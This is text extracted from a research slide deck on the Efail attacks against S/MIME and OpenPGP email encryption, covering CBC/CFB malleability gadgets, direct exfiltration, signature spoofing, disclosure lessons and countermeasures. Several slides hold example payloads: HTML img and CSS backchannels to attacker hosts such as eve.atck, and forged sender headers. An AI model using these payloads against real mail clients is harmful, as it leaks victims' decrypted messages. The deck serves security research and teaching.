Efail attack and it its im implications Juraj Somorovsky Damian - - PowerPoint PPT Presentation

Efail attack and it its im implications

Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2

Juraj Somorovsky

About this talk

• Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration
• Channels. Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising,

Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018

• Johnny, you are fired! Spoofing OpenPGP and S/MIME Signatures in Email. Jens

Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2019

3

Email.

Internet Message Format („Email“)

4

From: Alice To: Bob Subject: Breaking News Congratulations, you have been promoted!

Multipurpose Internet Mail Extensions (MIME)

5

From: Alice To: Bob Subject: Breaking News Content-Type: text/plain Congratulations, you have been promoted!

Multipurpose Internet Mail Extensions (MIME)

6

From: Alice To: Bob Subject: Breaking News Content-Type: multipart/mixed; boundary="BOUNDARY"

• -BOUNDARY

Content-type: text/plain Congratulations, you have been promoted!

• -BOUNDARY

Content-type: application/pdf Contract...

• -BOUNDARY--

smtp.corp1 av1.com archive.corp1 smtp.corp2 av2.com archive.corp2 imap.corp1 imap.corp2

imap.corp1 smtp.corp1 av1.com archive.corp1

10

There is no such thing as

“My Email”.

imap.corp1 smtp.corp1 av1.com archive.corp1

Assumption: Attacker has access to emails!

Motivation for using end-to-end encryption

Insecure Transport

• TLS might be used – we don’t know!

Nation state attackers (see also lecture given by Tibor)

• Massive collection of emails
• Snowden’s global surveillance disclosure

Breach of email provider / email account

• Single point of failure
• Aren’t they reading/analyzing my emails anyway?

12

Two competing standards

OpenPGP (RFC 4880)

• Favored by privacy advocates
• Web-of-trust (no authorities)

S/MIME (RFC 5751)

• Favored by organizations
• Multi-root trust-hierarchies

13

Signed Email (S/MIME)

14

From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed; boundary="BOUNDARY“; protocol="application/pkcs7-signature“

• -BOUNDARY

Content-type: text/plain Congratulations, you have been promoted!

• -BOUNDARY

Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA==

• -BOUNDARY--

Signed Email (S/MIME)

15

From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed; boundary="BOUNDARY“; protocol="application/pkcs7-signature“

• -BOUNDARY

Content-type: text/plain Congratulations, you have been promoted!

• -BOUNDARY

Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA==

• -BOUNDARY--

Signed Email (S/MIME)

16

From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed; boundary="BOUNDARY“; protocol="application/pkcs7-signature“

• -BOUNDARY

Content-type: text/plain Congratulations, you have been promoted!

• -BOUNDARY

Content-Type: application/pkcs7-signature Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD… OlA9pggcyAAAAAAAAA==

• -BOUNDARY--

Signed Email (PGP)

17

From: Alice To: Bob Subject: Breaking News Content-Type: multipart/signed; boundary="BOUNDARY"; protocol="application/pgp-signature“

• -BOUNDARY

Content-type: text/plain Congratulations, you have been promoted!

• -BOUNDARY

Content-Type: application/pgp-signature

• ----BEGIN PGP SIGNATURE-----

iQE/BAEBAgApBQJbW1tqIhxCcnVjZSBXYXluZSA8YnJ1Y2V3YX…

• ----END PGP SIGNATURE-----
• -BOUNDARY--

Encrypted Email (PGP)

18

From: Alice To: Bob Subject: Breaking News Content-Type: multipart/encrypted; boundary="BOUNDARY"; protocol="application/pgp-encrypted";

• -BOUNDARY

Content-Type: application/octet-stream; name="encrypted.asc" Content-Description: OpenPGP encrypted message Content-Disposition: inline; filename="encrypted.asc"

• ----BEGIN PGP MESSAGE-----

hQIMA0Zy9l4Cw+FaAQ//YewiWjMoX2BebbwJQJMJxvHRoF30NjkZe88m9kGts/tn DgkUPQEgJJJq/K1TwyAvR8tSLq…

• ----END PGP MESSAGE-----
• -BOUNDARY--

Known limitations!

Usability Snowden Effekt

Enigmail New keys at keyserver Hard for S/MIME

Opsec von Snowden und thegruq Ver- und Entschlüsselung nur in separater Anwendung!

19

New published PGP public keys per month

?

• https://vimeo.com/56881481
• https://gist.github.com/grugq/03167bed45e774

551155

Some tutorials recommend using PGP outside of email client. Others recommended Enigmail in default settings (i.e. HTML switched on)

PGP and OpSec

20

21

Ok, so how about the security?

22 ‘06 ‘15 ‘99

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

23

2014: Enigmail won’t encrypt.

24 https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/

25

2017: Outlook includes plaintext in encrypted email.

https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/

2018: Enigmail/PEP won‘t encrypt.

26

https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html

Both standards use old crypto

Ciphertext C = Enc(M) C1 valid/invalid M = Dec(C) C2 valid/invalid … (repeated several times)

Both standards use old crypto

27

Old crypto has no negative impact

CBC / CFB modes of operation used, but their usage is not exploitable

29

Assumption: Email is non-interactive

Old crypto has no negative impact

Backchannel

• Any functionality that forces the email client to interact with the

network

• HTML/CSS
• JavaScript
• Email header
• Attachment preview
• Certificate verification

30

<img src="http://efail.de"> <object data="ftp://efail.de"> <style>@import '//efail.de'</style> ... XSS cheat sheets Disposition-Notification-To: eve@evil.com Remote-Attachment-URL: http://efail.de X-Image-URL: http://efail.de … OCSP, CRL, intermediate certs PDF, SVG, VCards, etc.

Windows Linux macOS iOS Android Webmail Webapp

Outlook IBM Notes Postbox Foxmail Live Mail Pegasus The Bat! Mulberry eM Client

Thunderbird

Evolution KMail Trojitá Claws Mutt

Apple Mail

Airmail MailMate Mail App

CanaryMail

Outlook K-9 Mail R2Mail MailDroid Nine GMail

Outlook.com

Yahoo! iCloud GMX

HushMail

Mail.ru FastMail

Roundcube

RainLoop AfterLogic

Horde IMP

ProtonMail

Mailfence Mailbox ZoHo Mail

leak by default ask user leak via bypass script execution

Backchannels found

W8Mail W10Mail WLMail

Mailpile Exchange GroupWise

Evaluation of backchannels in email clients

31

Attacker model

32

Attacker model

33

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

34

S/MIME uses CBC

• Cipher Block Chaining mode of operation
• Not authenticated
• Vulnerable to many attacks (TLS, XML Encryption, SSH)
• Basic problem: malleability

Source: wikipedia

Malleability of CBC

36

decryption

C1 P0

decryption

C2 P1 C0

Malleability of CBC

37

decryption

Content-type: te

C1 P0'

decryption

xt/html\nDear Bob

C2 P1 C0'

Malleability of CBC

38

decryption

Zontent-type: te

C1 P0'

decryption

xt/html\nDear Bob

C2 P1 C0'

Malleability of CBC

39

C0 ⊕ P0

decryption

0000000000000000

C1 P0'

decryption

xt/html\nDear Bob

C2 P1

CBC Gadget

Malleability of CBC

40

C0 ⊕ P0 ⊕ Pc

decryption

<img src=”ev.il/

C1 P0'

decryption

xt/html\nDear Bob

C2 P1

Malleability of CBC

41

decryption

Content-type: te

C1' P0'

decryption

Zt/html\nDear Bob

C2 P1' C0

Malleability of CBC

42

decryption

????????????????

C1' P0'

decryption

Zt/html\nDear Bob

C2 P1' C0

Practical Attack against S/MIME

43

???????????????? <img " Content-type: te xt/html\nDear Sir

• r Madam, the se

ecret meeting wi ???????????????? " src="efail.de/ ???????????????? Content-type: te xt/html\nDear Sir

• r Madam, the se

???????????????? "> Original Crafted

44

Practical Attack against S/MIME

Demo

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

46

OpenPGP

• OpenPGP uses a variation of CFB-Mode
• Uses integrity protection with MDC (Modification Detection Code)
• Compression is enabled by default

48

Ci Pi (known) Ci+1 Pi-1

encryption encryption

X Ci

encryption

Pc (chosen)

random plaintext

? ? ? ? ? ? ? ?

encryption

RFC4880 on Modification Detection Codes

Defeating integrity protection

50

Vulnerable Not Vulnerable

Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE

Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01

MDC Stripped MDC Incorrect SEIP -> SE

54

55

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

56

Direct exfiltration

• This attack is possible since 2003 in Thunderbird
• Independent of the applied encryption scheme
• Somewhat fixable in implementation
• But works directly in …
• Apple Mail / Mail App
• Thunderbird
• Postbox
• …
• The standards do not give any definition for that!

57

Encrypting Alice writes a Mail to Bob

From: Alice To: Bob Dear Bob, the meeting tomorrow will be at 9 o‘clock.

• ----BEGIN PGP MESSAGE-----

hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg…

• ----END PGP MESSAGE-----

Alice’s mail program encrypts the email

Direct exfiltration

58

Original E-Mail Eve’s attack E-Mail

Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> From: Eve To: Bob From: Alice To: Bob

Eve modifies the email and sends it to Bob or Alice Eve captures the encrypted mail between Alice and Bob

• ----BEGIN PGP MESSAGE-----

hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg…

• ----END PGP MESSAGE-----

Direct exfiltration

59

Bob’s mail program decrypts the email Decrypting Eve’s attack E-Mail

Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> From: Eve To: Bob

Bob’s mail program puts the clear text back into the body

• ----BEGIN PGP MESSAGE-----

hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg…

• ----END PGP MESSAGE-----

Dear Bob, the meeting tomorrow will be at 9 o‘clock.

Direct exfiltration

60

Eve’s attack E-Mail

Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> Dear Bob, the meeting tomorrow will be at 9 o‘clock. Content-Type: text/html <img src="http://eve.atck/Dear Bob, the meeting tomorrow will be at 9 o‘clock.“> From: Eve To: Bob GET /Dear%20Bob%2C%0D%0Athe %20meeting%20tomorrow%20will %20be%20at%209%20o%E2%80%98c lock.

Eve

Direct exfiltration

61

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

62

63

S/MIME OpenPGP

Exfiltrating many emails

Recap:

• Attacker can exfiltrate hundreds of S/MIME or OpenPGP ciphertexts

with single malicious email.

• Victim merely needs to open the email.
• In May 2018, two widely used clients (Apple Mail and Thunderbird)

either

• weren‘t patched or
• patches were insufficient

64

It did not work well

• Embargo broken
• Community angry
• Of course, nobody read the paper

67

68

An independent summary of the disclosure timeline, compiled from public information.

http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html

Disclosure; lessons learnt

1. Stick to a 90 day disclosure deadline. 2. Be careful with disclosure pre-announcements, because:

• People will speculate about the details and

a) underrate/overrate the risk, and b) spread false information.

• you won‘t be in control of communicating the details.

3. Controlling information flow right after disclosure is essential.

70

Having a website with general information is necessary (logo ???)

71

How about the countermeasures?

S/MIME Version 4.0 (RFC 8551)

• References EFAIL paper
• Recommends the usage of authenticated encryption with AES-GCM

72

S/MIME Version 4.0 (RFC 8551)

S/MIME Version 4.0 (RFC 8551)

OpenPGP - draft-ietf-openpgp-rfc4880bis-07

• Deprecates Symmetrically Encrypted (SE) data packets
• Proposes AEAD protected data packets
• Implementations should not allow users to access erroneous data

75

How about signatures?

• Encrypt-then-sign?
• Sign-then-encrypt?

…and of course, there are also different problems 

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

77

Motivation

• We already broke email encryption
• The systems are set up;
• Configuring S/MIME and PGP is the most challenging part of our research
• How about email signatures?

Attacker-controlled UI elements

Signature Spoofing

We attack the presentation and interpretation of email signatures. We do not attack the underlying cryptography.

80

As a cryptographer, you should consider this as a neat warning that strong crypto is not everything

Methodology

• 25 clients
• PGP and S/MIME
• All major platforms
• Developed 5 attack classes:
• 3 common
• 1 specific to PGP
• 1 specific to S/MIME
• Considered 3 forgery classes

Forgery Classes

• Perfect forgery

◐ Partial forgery

○ Weak forgery

82

Forgery Classes

83

• Perfect forgery

◐ Partial forgery

○ Weak forgery

Forgery Classes

84

• Perfect forgery

◐ Partial forgery

○ Weak forgery

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

86

87

88

UI Redressing – Causes

• HTML and CSS support in email clients
• Security indicators in mail body
• Often implemented by third-party plugin
• Intuitive (signature assigned to plaintext)

89

UI Redressing – Countermeasures

90

Enigmail < 2.0.8 Enigmail ≥ 2.0.8

91

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

92

How Is Signer Bound to Signed Content?

93

Identity Binding Attacks

94

What could possibly go wrong?

Identity Binding Attacks

95

Eve <eve@evil.com> From: Displayed sender Verification logic

RFC 5322 display names

Identity Binding Attacks

96

From: manager@work.com From: eve@evil.com From: manager@work.com <eve@evil.com> Displayed sender Verification logic From: manager@work.com Sender: eve@evil.com Reply-to: manager@work.com

Multiple headers

Identity Binding Attacks

97

From: manager@work.com [ whitespace ] <eve@evil.com> [valid signature by eve@evil.com] <eve@evil.com>

Identity Binding Attacks – Causes & Countermeasures

• Functional features (Sender, From) have become

security relevant

• Explicitly showing signer details shifts problem to user

98

99

106

1. Breaking Email Encryption 1. Malleability Gadget Attacks on S/MIME 2. Malleability Gadget Attacks on OpenPGP 3. Direct Exfiltration Attacks 4. Responsible Disclosure 2. Breaking Email Signatures 1. UI Redressing 2. Identity Binding 3. Conclusions

Overview

107

Conclusions

• Introduced malleability gadgets and backchannels
• Self-exfiltrating plaintexts; applicable to different standards as well
• Crypto standards need to evolve
• Current S/MIME is broken
• OpenPGP needs clarification
• Signed emails have problems as well
• Crypto standards are not only about strong cryptographic algorithms
• Secure HTML email is challenging

108